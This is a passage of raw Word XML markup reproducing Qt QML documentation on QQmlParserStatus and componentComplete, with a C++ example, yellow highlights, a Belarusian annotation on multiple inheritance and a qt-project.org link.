          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Receiving Notifications for Object Initialization</w:t>
      </w:r>
      <w:bookmarkEnd w:id="322"/>
      <w:bookmarkEnd w:id="323"/>
      <w:bookmarkEnd w:id="324"/>
      <w:bookmarkEnd w:id="325"/>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For some custom QML object types, it </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA192B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">may be beneficial to </w:t>
      </w:r>
      <w:r w:rsidRPr="00C34F7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>delay the initialization</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of particular data until the object has been created and all of its properties have been set. For example, this may be the case </w:t>
      </w:r>
      <w:r w:rsidRPr="00C34F7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if the initialization is costly</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA192B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if the initialization should not be performed until all property values have been initialized</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00DA77C2" w:rsidP="00DA77C2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId277" w:history="1">
        <w:r w:rsidRPr="00C34F7E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt QML</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C34F7E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C34F7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId278" w:history="1">
        <w:r w:rsidRPr="00C34F7E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlParserStatus</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to be subclassed for these purposes. It defines a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA192B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>number of virtual methods that are invoked at various stages during component instantiation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. To receive these notifications, a C++ class should inherit</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId279" w:history="1">
        <w:r w:rsidRPr="00C34F7E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlParserStatus</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and also notify the Qt meta system using the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId280" w:anchor="Q_INTERFACES" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Q_</w:t>
        </w:r>
        <w:r w:rsidRPr="00C34F7E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>INTERFACES</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() macro.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00DA77C2" w:rsidP="00DA77C2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA192B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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class</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MyQmlType</w:t>
      </w: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public</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QObject</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</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public</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QQmlParserStatus</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Q_OBJECT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Q_INTERFACES</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QQmlParserStatus</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>public</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virtual</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> componentComplete</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pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2"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A77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Perform some initialization here now that the object is fully created</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00E7621B" w:rsidRDefault="00DA77C2" w:rsidP="00DA77C2">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00E7621B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B6215" w:rsidRPr="00E7621B" w:rsidRDefault="00DA77C2" w:rsidP="00C34F7E">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E7621B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34F7E" w:rsidRPr="00FA192B" w:rsidRDefault="00FA192B" w:rsidP="00CD6118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA192B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">|| </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA192B">
        <w:rPr>
          <w:i/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>палезны кантэкст выкарыстання множнай спадчыннасці</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA192B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> ||</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00E7621B" w:rsidRDefault="00490E7E" w:rsidP="00CD6118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId281" w:history="1">
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00E7621B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00E7621B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>project</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00E7621B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>org</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00E7621B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>doc</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00E7621B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00E7621B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>-5.1/</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>qtqml</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00E7621B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>qtqml</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00E7621B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>modules</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00E7621B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>topic</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00E7621B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003E3556" w:rsidRPr="003E3556" w:rsidRDefault="003E3556" w:rsidP="00FA192B">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="326" w:name="_Toc483000601"/>
      <w:bookmarkStart w:id="327" w:name="_Toc483003618"/>
      <w:bookmarkStart w:id="328" w:name="_Toc483603954"/>
      <w:bookmarkStart w:id="329" w:name="_Toc483605174"/>
      <w:r w:rsidRPr="00FA192B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML Modules</w:t>
      </w:r>
      <w:bookmarkEnd w:id="326"/>
      <w:bookmarkEnd w:id="327"/>
